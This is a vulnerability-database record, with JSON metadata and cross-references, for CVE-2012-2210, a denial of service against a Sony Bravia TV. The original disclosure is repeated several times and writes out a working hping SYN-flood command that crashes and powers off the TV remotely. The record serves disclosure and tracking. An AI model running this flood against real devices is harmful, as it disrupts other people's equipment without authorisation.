Sony Bravia Remote Denial of Service - CVE-2012-2210
2012-04-09T00:00:00
ID SECURITYVULNS:DOC:27876 Type securityvulns Reporter Securityvulns Modified 2012-04-09T00:00:00
Description
Exploit Title: Sony Bravia Remote Denial of Service
Date: 04/04/2012
Author: Gabriel Menezes Nunes
Version: Sony Bravia TV
Tested on: Sony Bravia TV (KDL-32CX525)
CVE: CVE-2012-2210
Playing with my TV, I found a bug that can crash the device.
Running a hping command against a Sony Bravia TV (KDL-32CX525),
all the functions stop working instantly. You cannot change the
volume, channels or access any function. Instantly. After 35 seconds
the TV stop working and back. This happens 3 times. At fourth time, the
TV shuts down. In less than 3 minutes, the TV is off remotely. It is
necessary to turn on the TV physically.
Attack:
hping -S TV.IP.Address -p anyport -i u1 --flood
Example: hping -S 10.0.0.3 -p 2828 -i u1 --flood
{"id": "SECURITYVULNS:DOC:27876", "bulletinFamily": "software", "title": "Sony Bravia Remote Denial of Service - CVE-2012-2210", "description": "# Exploit Title: Sony Bravia Remote Denial of Service\r\n# Date: 04/04/2012\r\n# Author: Gabriel Menezes Nunes\r\n# Version: Sony Bravia TV\r\n# Tested on: Sony Bravia TV (KDL-32CX525)\r\n# CVE: CVE-2012-2210\r\n\r\nPlaying with my TV, I found a bug that can crash the device.\r\n\r\nRunning a hping command against a Sony Bravia TV (KDL-32CX525),\r\nall the functions stop working instantly. You cannot change the\r\nvolume, channels or access any function. Instantly. After 35 seconds\r\nthe TV stop working and back. This happens 3 times. At fourth time, the\r\nTV shuts down. In less than 3 minutes, the TV is off remotely. It is\r\nnecessary to turn on the TV physically.\r\n\r\nAttack:\r\n\r\nhping -S TV.IP.Address -p anyport -i u1 --flood\r\n\r\nExample: hping -S 10.0.0.3 -p 2828 -i u1 --flood\r\n", "published": "2012-04-09T00:00:00", "modified": "2012-04-09T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27876", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2012-2210"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:44", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "58ba565ac6b28108cee5573b4c42f4e4"}, {"key": "cvss", "hash": "ed3111898fb94205e2b64cefef5a2081"}, {"key": "description", "hash": "6c0129955f9411150ebd7fbf620de296"}, {"key": "href", "hash": "d217797c8e135594c5e39a17260996e0"}, {"key": "modified", "hash": "e9cddcf4ca4de1889348a413180bfac9"}, {"key": "published", "hash": "e9cddcf4ca4de1889348a413180bfac9"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "bf56dd27c3383eb8a3109d04badeab32"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "7b1b84df8070a6dff4144be8de76c82ca9273095a8a7690729a03b3e367d5926", "viewCount": 1, "enchantments": {"score": {"value": 6.0, "vector": "NONE", "modified": "2018-08-31T11:10:44"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-2210"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:111588"]}, {"type": "exploitdb", "idList": ["EDB-ID:18705"]}, {"type": "seebug", "idList": ["SSV:72759"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12311"]}], "modified": "2018-08-31T11:10:44"}, "vulnersScore": 6.0}, "objectVersion": "1.3", "affectedSoftware": []}
{"cve": [{"lastseen": "2019-05-29T18:12:22", "bulletinFamily": "NVD", "description": "The Sony Bravia TV KDL-32CX525 allows remote attackers to cause a denial of service (configuration outage or device crash) via a flood of TCP SYN packets, as demonstrated by hping, a related issue to CVE-1999-0116.", "modified": "2017-12-20T02:29:00", "id": "CVE-2012-2210", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2210", "published": "2012-04-11T10:39:00", "title": "CVE-2012-2210", "type": "cve", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T10:17:12", "bulletinFamily": "exploit", "description": "Sony Bravia Remote Denial of Service. CVE-2012-2210. Dos exploit for hardware platform", "modified": "2012-04-05T00:00:00", "published": "2012-04-05T00:00:00", "id": "EDB-ID:18705", "href": "https://www.exploit-db.com/exploits/18705/", "type": "exploitdb", "title": "Sony Bravia Remote Denial of Service", "sourceData": "# Exploit Title: Sony Bravia Remote Denial of Service\r\n# Date: 04/04/2012\r\n# Author: Gabriel Menezes Nunes\r\n# Version: Sony Bravia TV\r\n# Tested on: Sony Bravia TV (KDL-32CX525)\r\n# CVE: CVE-2012-2210\r\n\r\nPlaying with my TV, I found a bug that can crash the device.\r\n\r\nRunning a hping command against a Sony Bravia TV (KDL-32CX525),\r\nall the functions stop working instantly. You cannot change the\r\nvolume, channels or access any function. Instantly. After 35 seconds\r\nthe TV stop working and back. This happens 3 times. At fourth time, the\r\nTV shuts down. In less than 3 minutes, the TV is off remotely. It is\r\nnecessary to turn on the TV physically.\r\n\r\nAttack:\r\n\r\nhping -S TV.IP.Address -p anyport -i u1 --flood \r\n\r\nExample: hping -S 10.0.0.3 -p 2828 -i u1 --flood\r\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18705/"}], "packetstorm": [{"lastseen": "2016-12-05T22:14:50", "bulletinFamily": "exploit", "description": "", "modified": "2012-04-05T00:00:00", "published": "2012-04-05T00:00:00", "href": "https://packetstormsecurity.com/files/111588/Sony-Bravia-TV-Denial-Of-Service.html", "id": "PACKETSTORM:111588", "type": "packetstorm", "title": "Sony Bravia TV Denial Of Service", "sourceData": "`# Exploit Title: Sony Bravia Remote Denial of Service \n# Date: 04/04/2012 \n# Author: Gabriel Menezes Nunes \n# Version: Sony Bravia TV \n# Tested on: Sony Bravia TV (KDL-32CX525) \n \nPlaying with my TV, I found a bug that can crash the device. \n \nRunning a hping command against a Sony Bravia TV (KDL-32CX525), \nall the functions stop working instantly. You cannot change the \nvolume, channels or access any function. Instantly. After 35 seconds \nthe TV stop working and back. This happens 3 times. At fourth time, the \nTV shuts down. In less than 3 minutes, the TV is off remotely. It is \nnecessary to turn on the TV physically. \n \nAttack: \n \nhping -S TV.IP.Address -p anyport -i u1 --flood \n \nExample: hping -S 10.0.0.3 -p 2828 -i u1 --flood \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/111588/sonybravia-dos.txt", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T14:13:30", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-72759", "id": "SSV:72759", "title": "Sony Bravia Remote Denial of Service", "type": "seebug", "sourceData": "\n # Exploit Title: Sony Bravia Remote Denial of Service\r\n# Date: 04/04/2012\r\n# Author: Gabriel Menezes Nunes\r\n# Version: Sony Bravia TV\r\n# Tested on: Sony Bravia TV (KDL-32CX525)\r\n# CVE: CVE-2012-2210\r\n\r\nPlaying with my TV, I found a bug that can crash the device.\r\n\r\nRunning a hping command against a Sony Bravia TV (KDL-32CX525),\r\nall the functions stop working instantly. You cannot change the\r\nvolume, channels or access any function. Instantly. After 35 seconds\r\nthe TV stop working and back. This happens 3 times. At fourth time, the\r\nTV shuts down. In less than 3 minutes, the TV is off remotely. It is\r\nnecessary to turn on the TV physically.\r\n\r\nAttack:\r\n\r\nhping -S TV.IP.Address -p anyport -i u1 --flood \r\n\r\nExample: hping -S 10.0.0.3 -p 2828 -i u1 --flood\r\n\n ", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-72759"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:46", "bulletinFamily": "software", "description": "Flood attack with malcrafted packets causes device to hang.", "modified": "2012-04-09T00:00:00", "published": "2012-04-09T00:00:00", "id": "SECURITYVULNS:VULN:12311", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12311", "title": "Sony Bravia TV sets DoS", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}]}